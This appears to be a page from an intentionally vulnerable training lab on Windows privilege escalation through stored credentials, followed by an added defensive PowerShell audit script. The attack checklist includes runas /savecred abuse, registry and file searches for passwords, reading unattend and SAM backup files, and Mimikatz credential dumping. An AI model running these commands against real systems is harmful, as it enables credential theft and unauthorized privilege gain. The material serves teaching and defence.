🪟 Windows Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Windows privilege escalation techniques. Start as a low-privilege user and escalate to SYSTEM or Administrator.
Lab Credentials: ram / pracivo  |  alice / alice123  |  administrator / Admin@2024 (goal: escalate to this)

Stored Credentials

PRIVILEGE ESCALATION / LATERAL MOVEMENT
# Windows stores credentials in multiple places

# 1. Windows Credential Manager
cmdkey /list
# Output might show:
# Target: Domain:interactive=CORP\administrator
# Type: Domain Password
# Use runas to use stored creds without knowing the password:
runas /savecred /user:CORP\administrator "cmd.exe"

# 2. Check for passwords in common locations
dir /s /b *pass* *cred* *vnc* *.config 2>nul
findstr /si password *.xml *.ini *.txt *.config
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# 3. Check unattended install files (contain plaintext admin password)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\Windows\system32\sysprep\sysprep.xml

# 4. Check for SAM/SYSTEM backup files
dir /s SAM 2>nul
# C:\Windows\Repair\SAM  ← old backup, may be crackable

# 5. PowerShell history file
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Often contains commands with passwords typed in plain text

# 6. Mimikatz — dump all credentials from memory
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
# Dumps NTLM hashes and plaintext passwords for all logged-in users
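Defender-side companion to the checklist above, added here and not part of the Pracivo lab: an audit script that reports whether each of the six credential-exposure conditions exists on a host and whether the mitigations that blunt them (LSA Protection, Credential Guard) are in place. It assumes it is run from an elevated PowerShell session; the file paths and registry values are the standard Windows ones, and the finding text is the assumed remediation wording.

```powershell
# Added defensive audit (not lab code). Reports exposures, does not change anything.
$findings = @()

# 1. Saved credentials that "runas /savecred" could reuse
$saved = cmdkey /list | Select-String -Pattern '^\s*Target:'
if ($saved) {
  $findings += "Credential Manager holds $($saved.Count) saved target(s); review 'cmdkey /list' and remove stale entries with 'cmdkey /delete:<target>'."
}

# 2/3. Unattended-install answer files that may still embed an admin password
$answerFiles = @(
  "$env:SystemRoot\Panther\unattend.xml",
  "$env:SystemRoot\Panther\Unattended.xml",
  "$env:SystemRoot\System32\Sysprep\sysprep.xml"
) | Where-Object { Test-Path $_ }
foreach ($f in $answerFiles) {
  if (Select-String -Path $f -Pattern '<Password>|<AdministratorPassword>' -Quiet) {
    $findings += "Answer file $f still contains credential elements; delete it after deployment."
  }
}

# 4. Leftover SAM/SYSTEM hive backups in the Repair directory
foreach ($hive in 'SAM', 'SYSTEM') {
  $p = "$env:SystemRoot\Repair\$hive"
  if (Test-Path $p) { $findings += "Hive backup $p exists; remove it or restrict its ACL to SYSTEM/Administrators." }
}

# 5. PSReadLine history with secrets typed inline
$hist = "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
if ((Test-Path $hist) -and (Select-String -Path $hist -Pattern 'password|pwd|/p:' -Quiet)) {
  $findings += "PSReadLine history contains password-like strings; clear it and use Get-Credential instead of inline secrets."
}

# 6. Mitigations against LSASS memory dumping (sekurlsa::logonpasswords)
$lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
if (-not $lsa -or $lsa.RunAsPPL -ne 1) {
  $findings += "LSA Protection is off; set HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL (DWORD) = 1 and reboot."
}
$dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
if (-not $dg -or $dg.SecurityServicesRunning -notcontains 1) {
  $findings += "Credential Guard is not running; enable it so LSASS secrets are isolated."
}

if ($findings.Count -eq 0) { 'No findings.' } else { $findings | ForEach-Object { "[!] $_" } }
```

Run it on the lab VM before and after applying the remediations to confirm each finding clears.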